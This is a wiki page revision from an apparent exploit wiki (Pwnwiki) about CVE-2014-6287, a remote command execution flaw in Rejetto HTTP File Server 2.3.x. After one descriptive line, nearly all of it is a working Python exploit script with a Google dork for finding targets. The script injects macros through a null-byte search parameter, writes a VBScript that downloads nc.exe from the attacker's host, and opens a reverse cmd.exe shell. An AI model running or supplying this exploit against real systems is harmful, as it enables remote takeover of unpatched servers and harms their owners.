Pwnwiki: Created page with "==INFO== The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (aks HFS or HttpFileServer) 2.3x before 2.3c allows remote attackers to execute arbitrary pr..."

2021-04-07T08:11:43Z

Created page with "==INFO== The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (aks HFS or HttpFileServer) 2.3x before 2.3c allows remote attackers to execute arbitrary pr..."

New page

==INFO==
The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (aks HFS or HttpFileServer) 2.3x before 2.3c allows remote attackers to execute arbitrary programs via a %00 sequence in a search action.

==EXP==
<pre>

# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 04-01-2016
# Remote: Yes
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
# Description: You can use HFS (HTTP File Server) to send and receive files.
# It's different from classic file sharing because it uses web technology to be more
# compatible with today's Internet. It also differs from classic web servers because
# it's very easy to use and runs "right out-of-the box". Access your remote files, over
# the network. It has been successfully tested with Wine under Linux.

# Usage is: python %s <Target IP address> <Target Port Number> <Local ip where http server listen> <local port for the reverse shell>
# EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).
# You may need to run it multiple times for success!

import urllib2 as url
import sys

if len(sys.argv) == 5:
rhost = sys.argv[1]
rport = sys.argv[2]
lhost = sys.argv[3] # local IP address
lport = sys.argv[4] # Local Port number
else:
print "[-] Something went wrong..!"
print "[-] Usage is: python %s <Target IP address> <Target Port Number> <Local ip where http server listen> <local port for the reverse shell>" % sys.argv[0]
print "[-] Don't forget to have an http server with will serve the nc.exe file like http://local_ip:80/nc.exe"
sys.exit(-1)
vbscript="C:\Users\Public\script.vbs"
ncdownurl="http://"+lhost+"/nc.exe"
ncpathsave="C:\\Users\\Public\\nc.exe"
exe1 = "exec|" + "cscript.exe "+vbscript
exe2 = "exec|" + ncpathsave+" -e cmd.exe " +lhost + " " + lport

save='''save|'''+vbscript+'''|dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "'''+ncdownurl+'''", False
xHttp.Send

with bStrm
.type = 1 '//binary
.open
.write xHttp.responseBody
.savetofile "'''+ncpathsave+'''", 2 '//overwrite
end with
'''

try:
# create vbs wget nc.exe
url.urlopen("http://" + rhost + ":" + rport + "/?search=%00{.+" + url.quote(save) + ".}")

#execute_script
url.urlopen("http://" + rhost + ":" + rport + "/?search=%00{.+" + url.quote(exe1) + ".}")

#nc_run():
url.urlopen("http://" + rhost + ":" + rport + "/?search=%00{.+" + url.quote(exe2) + ".}")
except:
print "[-] Something went wrong..!"
print "[-] Usage is: python %s <Target IP address> <Target Port Number> <Local ip where http server listen> <local port for the reverse shell>" % sys.argv[0]
print "[-] Don't forget to have an http server with will serve the nc.exe file like http://local_ip:80/nc.exe"
sys.exit(-1)

</pre>

CVE-2014-6287 Rejetto HTTP File Server 任意程序執行漏洞 - Revision history

Pwnwiki: Created page with "==INFO== The findMacroMarker function in parserLib.pas in Rejetto HTTP File Server (aks HFS or HttpFileServer) 2.3x before 2.3c allows remote attackers to execute arbitrary pr..."